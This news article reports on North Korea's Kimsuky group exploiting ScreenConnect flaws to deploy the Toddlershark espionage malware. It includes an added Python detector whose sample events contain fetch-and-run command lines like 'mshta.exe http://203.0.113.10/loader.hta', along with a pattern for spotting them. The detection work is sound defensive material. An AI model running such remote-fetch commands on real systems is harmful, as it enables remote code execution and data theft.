North Korean hackers used recently disclosed vulnerabilities in ConnectWise ScreenConnect to deploy new malware called Toddlershark.
According to a report by Kroll, Toddlershark shares similarities with known Kimsuky malware variants such as BabyShark and ReconShark.
“Attackers exploited the vulnerabilities in the ScreenConnect application settings to gain access to the victims’ workstations,” reported researchers Keith Wojcieszek, George Glass and Dave Truman. “They then utilized this access to execute mshta.exe with a URL to the malicious software, which is written in Visual Basic.”
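As an added example that is not part of Kroll's report, the following detector runs over constructed process-creation events and flags the step described above: mshta.exe launched with a remote URL, ranked higher when a ScreenConnect process sits in the ancestor chain. The event schema, the sample URLs and the assumption that the ScreenConnect client process name contains "screenconnect" are all mine, not from the page.

```python
import re
from pathlib import PureWindowsPath

# Constructed process-creation events (not real telemetry): launched image,
# command line, and ancestor images nearest first.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe http://203.0.113.10/loader.hta",
     "ancestors": [r"C:\Windows\System32\cmd.exe",
                   r"C:\Program Files (x86)\ScreenConnect Client\ScreenConnect.ClientService.exe"]},
    {"image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r'mshta.exe "C:\Users\alice\AppData\Local\Temp\setup.hta"',
     "ancestors": [r"C:\Windows\explorer.exe"]},
    {"image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe https://203.0.113.20/x",
     "ancestors": [r"C:\Windows\System32\wscript.exe", r"C:\Windows\explorer.exe"]},
]

URL_RE = re.compile(r"\bhttps?://[^\s\"']+", re.IGNORECASE)

def basename(path: str) -> str:
    # Lower-cased file name only, so matching ignores directory and case.
    return PureWindowsPath(path).name.lower()

def classify(event: dict):
    """Return (severity, reason) for an mshta.exe launch worth alerting on, else None."""
    if basename(event["image"]) != "mshta.exe":
        return None
    url = URL_RE.search(event["cmdline"])
    if url is None:
        return None  # local .hta argument: common and noisy, not alerted here
    ancestors = [basename(a) for a in event["ancestors"]]
    # Assumption: the ScreenConnect client process name contains "screenconnect".
    # mshta.exe pulling remote content beneath a remote-access tool is the chain
    # Kroll describes, so it ranks above a bare remote-URL launch.
    if any("screenconnect" in a for a in ancestors):
        return ("critical", f"mshta.exe fetched {url.group(0)} under a ScreenConnect session")
    return ("high", f"mshta.exe fetched remote content from {url.group(0)}")

def detect(events):
    """Run classify over an event stream and collect the alerts in order."""
    hits = []
    for ev in events:
        verdict = classify(ev)
        if verdict is not None:
            hits.append({"image": ev["image"], "severity": verdict[0], "reason": verdict[1]})
    return hits
```

In production the ancestor list would come from your EDR's process tree rather than from a hand-built event, and the ScreenConnect match should be widened to whatever remote-access tools are sanctioned in your environment.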
The vulnerabilities in question are ConnectWise CVE-2024-1708 and CVE-2024-1709, disclosed at the end of February. Since then, various groups have been actively exploiting them to distribute cryptocurrency miners, ransomware, remote access tools and information stealers.
The Kimsuky group, also known as APT43, continues to expand its arsenal of malicious tools; recent additions include GoBear and Troll Stealer. BabyShark, discovered in late 2018, runs as an HTML application that steals system information once it lands on a host and then awaits further instructions from its operator.
In May 2023, a BabyShark variant called ReconShark, distributed through phishing emails, was identified. Toddlershark is believed to be the latest iteration in this line because of code similarities and shared tactics.
Essentially, Toddlershark is designed to exfiltrate sensitive data from compromised systems, serving as a cyberespionage tool.
The Kroll researchers caution that Toddlershark “exhibits traits of polymorphic behavior, potentially making detection challenging in certain environments.”
Meanwhile, South Korea’s National Intelligence Service has accused North Korea of infiltrating the servers of two domestic semiconductor manufacturers and stealing valuable data in December 2023 and February 2024. It is speculated that North Korea may be gearing up for domestic semiconductor production in response to procurement challenges posed by sanctions and the increasing demand for semiconductors in weapon development.